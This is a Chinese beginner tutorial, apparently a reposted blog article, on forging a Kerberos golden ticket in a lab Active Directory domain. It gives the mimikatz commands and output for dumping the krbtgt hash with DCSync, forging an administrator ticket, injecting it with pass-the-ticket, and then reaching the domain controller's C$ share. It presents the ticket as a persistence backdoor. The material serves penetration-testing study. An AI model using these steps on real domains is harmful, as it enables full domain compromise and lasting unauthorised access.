黄金票据制作-新手向

2024-04-01 08:28
文章标签 新手 制作 黄金 票据

本文主要是介绍黄金票据制作-新手向,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

黄金票据制作

文章目录

  • 黄金票据制作
    • 0x01 前言
    • 0x02 黄金票据的制作
      • 一、靶场搭建
      • 二、收集制作信息
        • 获取域名称
        • 获取域SID值
        • 获取域用户krbtgt密码hash值
      • 二、制作票据
    • 0x03 验证票据有效性

0x01 前言

最近,我学习了内网渗透的相关知识,其中包括了黄金票据的应用。黄金票据涉及的原理和攻击方法构成了一系列复杂的概念,晦涩难懂。简而言之,黄金票据在内网渗透中主要用于权限维持,即留下后门。使用黄金票据前提是你已经控制了整个域的域控制器。其核心原理与服务器中的krbtgt用户相关。
在这里插入图片描述
如果想深入理解黄金票据的工作原理,需要进一步研究Kerberos协议。这里我推荐阅读以下博客来扩展知识:

https://daiker.gitbook.io/windows-protocol/

0x02 黄金票据的制作

一、靶场搭建

我搭建了三台虚拟机,操作系统分别为Windows Server 2016、Windows 10和Windows 7。Windows Server 2016担任域控制器的角色,而Windows 10和Windows 7则作为域成员机。在域中,我创建了三个用户:demo1、demo2和demo3。

如果你不熟悉如何搭建域环境,可以寻找现有的训练靶场,或者通过百度查询相关的搭建教程。

二、收集制作信息

制作黄金票据需要知道域名称、域的SID值、域用户krbtgt的密码hash值、任意用户名,现在假设我们拿到了域管理员的权限,下面完成一下信息收集:

获取域名称

systeminfo 、net user /domain 或者 ipconfig /all 都可以任选其一
在这里插入图片描述

获取域SID值

whoami /all 或者 whoami /user

C:\Users\demo1\Desktop\mimikatz_trunk\x64>whoami /user用户信息
----------------用户名       SID
============ ============================================
peihua\demo1 S-1-5-21-1100783840-19582525-4266664591-500

最后面的500是权限数字,不是sid所以需要的值如下:
SID:S-1-5-21-1100783840-19582525-4266664591

获取域用户krbtgt密码hash值

这里的hash值我使用了mimiikztz这样的工具进行获取,使用管理员权限运行cmd执行它
1.先执行privilege::debug进行权限提升
2.然后执行lsadump::dcsync /user:krbtgt /csv,返回结果如下:

mimikatz # lsadump::dcsync /user:krbtgt /csv
[DC] 'peihua.local' will be the domain
[DC] 'WIN-3TBP83C14B9.peihua.local' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  4d9ccdf4cd700017b5e6537ed6d59dc6  
514

4d9ccdf4cd700017b5e6537ed6d59dc6就是我们要的hash值

二、制作票据

如果已经准备好了所需信息,下马就可以使用mimikatz的kerberos::golden模块来创建黄金票据了,该票据的格式为.kirbi。下面我们来尝试进行制作:
kerberos::golden /domain:peihua.local /sid:S-1-5-21-1100783840-19582525-4266664591 /krbtgt:4d9ccdf4cd700017b5e6537ed6d59dc6 /user:administrator

mimikatz # kerberos::golden /domain:peihua.local /sid:S-1-5-21-1100783840-19582525-4266664591 /krbtgt:4d9ccdf4cd700017b5e6537ed6d59dc6 /user:administrator
User      : administrator
Domain    : peihua.local (PEIHUA)
SID       : S-1-5-21-1100783840-19582525-4266664591
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4d9ccdf4cd700017b5e6537ed6d59dc6 - rc4_hmac_nt
Lifetime  : 2024/3/31 16:04:20 ; 2034/3/29 16:04:20 ; 2034/3/29 16:04:20
-> Ticket : ticket.kirbi* PAC generated* PAC signed* EncTicketPart generated* EncTicketPart encrypted* KrbCred generatedFinal Ticket Saved to file !

查看下当前目录发现票据已经制作完成了
在这里插入图片描述

0x03 验证票据有效性

首先我们先登录一个域的普通账户,然后尝试通过dir访问域控的共享文件夹

C:\Users\demo1\Desktop\mimikatz_trunk\x64>dir \\WIN-3TBP83C14B9.peihua.local\c$
拒绝访问。

发现我们没有足够的权限去访问,下面我们使用mimikatz将创建好的票据文件导入,然后尝试重新访问
kerberos::purge #清空已有票据
kerberos::ptt xxx.kiribi #导入票据
kerberos::list #查看票据

C:\Users\demo1\Desktop\mimikatz_trunk\x64>mimikatz.exe.#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ##       > https://blog.gentilkiwi.com/mimikatz'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )'#####'        > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz # kerberos::ptt C:\Users\demo1\Desktop\mimikatz_trunk\x64\ticket.kirbi* File: 'C:\Users\demo1\Desktop\mimikatz_trunk\x64\ticket.kirbi': OKmimikatz # exit
Bye!C:\Users\demo1\Desktop\mimikatz_trunk\x64>dir \\WIN-3TBP83C14B9.peihua.local\c$驱动器 \\WIN-3TBP83C14B9.peihua.local\c$ 中的卷没有标签。卷的序列号是 B4D7-21A5\\WIN-3TBP83C14B9.peihua.local\c$ 的目录2016/07/16  21:23    <DIR>          PerfLogs
2016/12/14  19:06    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2024/03/28  21:20    <DIR>          Users
2024/03/28  22:34    <DIR>          Windows0 个文件              0 字 节5 个目录 51,617,316,864 可 用字节C:\Users\demo1\Desktop\mimikatz_trunk\x64>

成功访问了域控的共享文件夹,票据有效

这篇关于黄金票据制作-新手向的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/866685

相关文章

用Unity2D制作一个人物,实现移动、跳起、人物静止和动起来时的动画:中(人物移动、跳起、静止动作)

上回我们学到创建一个地形和一个人物,今天我们实现一下人物实现移动和跳起,依次点击,我们准备创建一个C#文件 创建好我们点击进去,就会跳转到我们的Vision Studio,然后输入这些代码 using UnityEngine;public class Move : MonoBehaviour // 定义一个名为Move的类,继承自MonoBehaviour{private Rigidbo

OpenStack离线Train版安装系列—0制作yum源

本系列文章包含从OpenStack离线源制作到完成OpenStack安装的全部过程。 在本系列教程中使用的OpenStack的安装版本为第20个版本Train(简称T版本),2020年5月13日,OpenStack社区发布了第21个版本Ussuri(简称U版本)。 OpenStack部署系列文章 OpenStack Victoria版 安装部署系列教程 OpenStack Ussuri版

OpenStack镜像制作系列5—Linux镜像

本系列文章主要对如何制作OpenStack镜像的过程进行描述记录 CSDN:OpenStack镜像制作教程指导(全) OpenStack镜像制作系列1—环境准备 OpenStack镜像制作系列2—Windows7镜像 OpenStack镜像制作系列3—Windows10镜像 OpenStack镜像制作系列4—Windows Server2019镜像 OpenStack镜像制作

OpenStack镜像制作系列4—Windows Server2019镜像

本系列文章主要对如何制作OpenStack镜像的过程进行描述记录  CSDN:OpenStack镜像制作教程指导(全) OpenStack镜像制作系列1—环境准备 OpenStack镜像制作系列2—Windows7镜像 OpenStack镜像制作系列3—Windows10镜像 OpenStack镜像制作系列4—Windows Server2019镜像 OpenStack镜像制作系

OpenStack镜像制作系列2—Windows7镜像

本系列文章主要对如何制作OpenStack镜像的过程进行描述记录 CSDN:OpenStack镜像制作教程指导(全) OpenStack镜像制作系列1—环境准备 OpenStack镜像制作系列2—Windows7镜像 OpenStack镜像制作系列3—Windows10镜像 OpenStack镜像制作系列4—Windows Server2019镜像 OpenStack镜像制作系列

OpenStack镜像制作系列1—环境准备

本系列文章主要对如何制作OpenStack镜像的过程进行描述记录 CSDN:OpenStack镜像制作教程指导(全) OpenStack镜像制作系列1—环境准备 OpenStack镜像制作系列2—Windows7镜像 OpenStack镜像制作系列3—Windows10镜像 OpenStack镜像制作系列4—Windows Server2019镜像 OpenStack镜像制作

CSDN:OpenStack镜像制作教程指导(全)

本系列文章主要对如何制作OpenStack镜像的过程进行描述记录,涉及基本环境准备、常见类型操作系统的镜像制作。 让你可以从零开始安装一个操作系统,并支持个性化制作OpenStack镜像。 CSDN:OpenStack镜像制作教程指导(全) OpenStack镜像制作系列1—环境准备 OpenStack镜像制作系列2—Windows7镜像 OpenStack镜像制作系列3—Windows

docker学习系列(四)制作基础的base项目镜像--jdk+tomcat

前面已经完成了docker的安装以及使用,现在我们要将自己的javaweb项目与docker结合 1.1准备jdk+tomcat软件 ​​我下载了apache-tomcat-7.0.68.tar.gz和jdk-7u79-linux-x64.tar.gz,存储于Linux机器的本地目录/usr/ect/wt/下(利用xshell上传)。利用linux命令 tar -zxvf apache-tom

选项卡制作问题--折磨了我一整天,记录下来

看老曹的html+css课程,学习html+css基础,讲到制作选项卡,以京东商城的选项卡为例,效果如下: 看着他做出来很简单,结果自己做花了2个多小时才有个样子,效果是这样的: 内部代码如下 <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-